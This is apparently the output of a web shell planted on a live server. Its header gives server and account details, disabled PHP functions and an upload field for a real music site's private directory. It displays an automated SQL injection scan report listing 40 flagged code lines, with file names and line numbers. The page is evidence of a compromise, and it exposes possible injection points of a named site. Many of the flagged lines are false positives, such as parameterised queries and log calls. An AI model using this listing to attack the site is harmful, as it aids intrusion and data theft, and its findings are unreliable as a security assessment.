404 Not Found

T.ME/BIBIL_0DAY
Server : Apache/2
System : Linux server-15-235-50-60 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
User : gositeme ( 1004)
PHP Version : 8.2.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory : /home/gositeme/domains/soundstudiopro.com/private_html/
Upload File :
Current File : /home/gositeme/domains/soundstudiopro.com/private_html/security_scan_report_2025-12-02_235445.txt
SQL Injection Security Scan Report
Generated: 2025-12-02 23:54:45
================================================================================

Files scanned: 606
Vulnerabilities found: 40

File: admin.php
--------------------------------------------------------------------------------
  Line 106: String concatenation with user input in SQL context
  Code: $response = ['success' => false, 'error' => 'Invalid action: ' . $_POST['playlist_action']];
  Fix: Use prepared statements with parameter binding

File: admin_api.php
--------------------------------------------------------------------------------
  Line 457: String concatenation with user input in SQL context
  Code: error_log("Admin API: update_user called with user_id=" . ($_GET['user_id'] ?? 'null') . ", credits=" . ($_GET['credits'] ?? 'null'));
  Fix: Use prepared statements with parameter binding

File: api_events.php
--------------------------------------------------------------------------------
  Line 407: WHERE clause with direct variable (may be unsafe)
  Code: $pdo->prepare("DELETE FROM event_tickets WHERE event_id = ?")->execute([$event_id]);
  Fix: Verify variable is validated or use prepared statement parameters

  Line 410: WHERE clause with direct variable (may be unsafe)
  Code: $pdo->prepare("DELETE FROM event_attendees WHERE event_id = ?")->execute([$event_id]);
  Fix: Verify variable is validated or use prepared statement parameters

  Line 413: WHERE clause with direct variable (may be unsafe)
  Code: $pdo->prepare("DELETE FROM event_likes WHERE event_id = ?")->execute([$event_id]);
  Fix: Verify variable is validated or use prepared statement parameters

  Line 416: WHERE clause with direct variable (may be unsafe)
  Code: $pdo->prepare("DELETE FROM event_comments WHERE event_id = ?")->execute([$event_id]);
  Fix: Verify variable is validated or use prepared statement parameters

  Line 419: WHERE clause with direct variable (may be unsafe)
  Code: $pdo->prepare("DELETE FROM event_managers WHERE event_id = ?")->execute([$event_id]);
  Fix: Verify variable is validated or use prepared statement parameters

  Line 148: execute() called without prepare()
  Code: $stmt->execute([
  Fix: Always use ->prepare() before ->execute()

File: api_social.php
--------------------------------------------------------------------------------
  Line 72: Direct query()/exec() with variable in SQL string
  Code: $pdo->exec("ALTER TABLE `{$tableName}` DROP CHECK `{$name}`");
  Fix: Use prepared statements with ->prepare() and ->execute()

  Line 76: Direct query()/exec() with variable in SQL string
  Code: $pdo->exec("ALTER TABLE `{$tableName}` DROP CONSTRAINT `{$name}`");
  Fix: Use prepared statements with ->prepare() and ->execute()

  Line 85: Direct query()/exec() with variable in SQL string
  Code: $pdo->exec("ALTER TABLE `{$tableName}` MODIFY `rating` TINYINT UNSIGNED NOT NULL");
  Fix: Use prepared statements with ->prepare() and ->execute()

  Line 92: Direct query()/exec() with variable in SQL string
  Code: $pdo->exec("ALTER TABLE `{$tableName}` ADD CONSTRAINT `{$constraintName}` CHECK (`rating` BETWEEN 1 AND 10)");
  Fix: Use prepared statements with ->prepare() and ->execute()

File: community_fixed.php
--------------------------------------------------------------------------------
  Line 376: WHERE clause with direct variable (may be unsafe)
  Code: $verify_stmt = $pdo->prepare("SELECT id FROM music_tracks WHERE id IN ($placeholders)");
  Fix: Verify variable is validated or use prepared statement parameters

File: events.php
--------------------------------------------------------------------------------
  Line 93: WHERE clause with direct variable (may be unsafe)
  Code: WHERE $where_clause
  Fix: Verify variable is validated or use prepared statement parameters

File: events_modern.php
--------------------------------------------------------------------------------
  Line 74: WHERE clause with direct variable (may be unsafe)
  Code: WHERE $where_clause
  Fix: Verify variable is validated or use prepared statement parameters

File: events_tao_inspired.php
--------------------------------------------------------------------------------
  Line 74: WHERE clause with direct variable (may be unsafe)
  Code: WHERE $where_clause
  Fix: Verify variable is validated or use prepared statement parameters

File: fix_artist_name.php
--------------------------------------------------------------------------------
  Line 28: WHERE clause with direct variable (may be unsafe)
  Code: $user = $pdo->query("SELECT * FROM users WHERE id = " . $track['user_id'])->fetch();
  Fix: Verify variable is validated or use prepared statement parameters

File: library.php
--------------------------------------------------------------------------------
  Line 724: execute() called without prepare()
  Code: $stmt->execute([$main_track['id']]);
  Fix: Always use ->prepare() before ->execute()

  Line 888: execute() called without prepare()
  Code: $stmt->execute([$main_track['id']]);
  Fix: Always use ->prepare() before ->execute()

File: admin_includes/dashboard.php
--------------------------------------------------------------------------------
  Line 90: WHERE clause with direct variable (may be unsafe)
  Code: WHERE {$successCondition}ulh.{$timeColumn} >= DATE_SUB(NOW(), INTERVAL 15 MINUTE)
  Fix: Verify variable is validated or use prepared statement parameters

  Line 111: WHERE clause with direct variable (may be unsafe)
  Code: WHERE ulh.{$timeColumn} >= DATE_SUB(NOW(), INTERVAL 15 MINUTE)
  Fix: Verify variable is validated or use prepared statement parameters

File: admin_includes/online_users.php
--------------------------------------------------------------------------------
  Line 188: WHERE clause with direct variable (may be unsafe)
  Code: WHERE {$successCondition}ulh.{$timeColumn} >= DATE_SUB(NOW(), INTERVAL 15 MINUTE)
  Fix: Verify variable is validated or use prepared statement parameters

File: admin_includes/playlists.php
--------------------------------------------------------------------------------
  Line 27: WHERE clause with direct variable (may be unsafe)
  Code: WHERE $playlist_where
  Fix: Verify variable is validated or use prepared statement parameters

File: admin_includes/purchases.php
--------------------------------------------------------------------------------
  Line 69: WHERE clause with direct variable (may be unsafe)
  Code: WHERE $where_clause
  Fix: Verify variable is validated or use prepared statement parameters

  Line 131: WHERE clause with direct variable (may be unsafe)
  Code: WHERE $where_clause
  Fix: Verify variable is validated or use prepared statement parameters

File: admin_includes/subscription_management.php
--------------------------------------------------------------------------------
  Line 36: WHERE clause with direct variable (may be unsafe)
  Code: $where_clause = !empty($where_conditions) ? "WHERE " . implode(" AND ", $where_conditions) : "";
  Fix: Verify variable is validated or use prepared statement parameters

File: admin_includes/tracks.php
--------------------------------------------------------------------------------
  Line 39: WHERE clause with direct variable (may be unsafe)
  Code: $where_clause = !empty($where_conditions) ? "WHERE " . implode(" AND ", $where_conditions) : "";
  Fix: Verify variable is validated or use prepared statement parameters

File: api/check_track_status.php
--------------------------------------------------------------------------------
  Line 254: execute() called without prepare()
  Code: $update_stmt->execute([
  Fix: Always use ->prepare() before ->execute()

  Line 333: execute() called without prepare()
  Code: $update_stmt->execute([
  Fix: Always use ->prepare() before ->execute()

File: api/save_album.php
--------------------------------------------------------------------------------
  Line 84: execute() called without prepare()
  Code: $stmt->execute([$albumId, $track['id'], $index + 1]);
  Fix: Always use ->prepare() before ->execute()

File: config/database.php
--------------------------------------------------------------------------------
  Line 160: Direct query()/exec() with variable in SQL string
  Code: $pdo->exec("ALTER TABLE music_tracks ADD COLUMN `$column` $definition");
  Fix: Use prepared statements with ->prepare() and ->execute()

File: config/email.php
--------------------------------------------------------------------------------
  Line 411: WHERE clause with direct variable (may be unsafe)
  Code: WHERE mt.id IN ($placeholders)
  Fix: Verify variable is validated or use prepared statement parameters

File: radio/api/v1/endpoints/catalog_tracks.php
--------------------------------------------------------------------------------
  Line 51: WHERE clause with direct variable (may be unsafe)
  Code: $count_stmt = $pdo->prepare("SELECT COUNT(*) FROM music_tracks WHERE $where_sql");
  Fix: Verify variable is validated or use prepared statement parameters

  Line 60: WHERE clause with direct variable (may be unsafe)
  Code: WHERE $where_sql
  Fix: Verify variable is validated or use prepared statement parameters

File: radio/api/v1/endpoints/get_plays.php
--------------------------------------------------------------------------------
  Line 38: WHERE clause with direct variable (may be unsafe)
  Code: $count_stmt = $pdo->prepare("SELECT COUNT(*) FROM radio_play_logs WHERE $where_sql");
  Fix: Verify variable is validated or use prepared statement parameters

  Line 49: WHERE clause with direct variable (may be unsafe)
  Code: WHERE $where_sql
  Fix: Verify variable is validated or use prepared statement parameters

File: radio/catalog/index.php
--------------------------------------------------------------------------------
  Line 156: WHERE clause with direct variable (may be unsafe)
  Code: $count_stmt = $pdo->prepare("SELECT COUNT(*) FROM music_tracks WHERE $where_sql");
  Fix: Verify variable is validated or use prepared statement parameters

  Line 184: WHERE clause with direct variable (may be unsafe)
  Code: WHERE $where_sql
  Fix: Verify variable is validated or use prepared statement parameters

File: radio/migrations/add_live_streaming_tables.php
--------------------------------------------------------------------------------
  Line 62: Direct query()/exec() with variable in SQL string
  Code: $pdo->exec("ALTER TABLE $table DROP FOREIGN KEY $constraint_name");
  Fix: Use prepared statements with ->prepare() and ->execute()

File: utils/optimize_database.php
--------------------------------------------------------------------------------
  Line 73: Direct query()/exec() with variable in SQL string
  Code: $pdo->exec("ANALYZE TABLE $table");
  Fix: Use prepared statements with ->prepare() and ->execute()
CasperSecurity Mini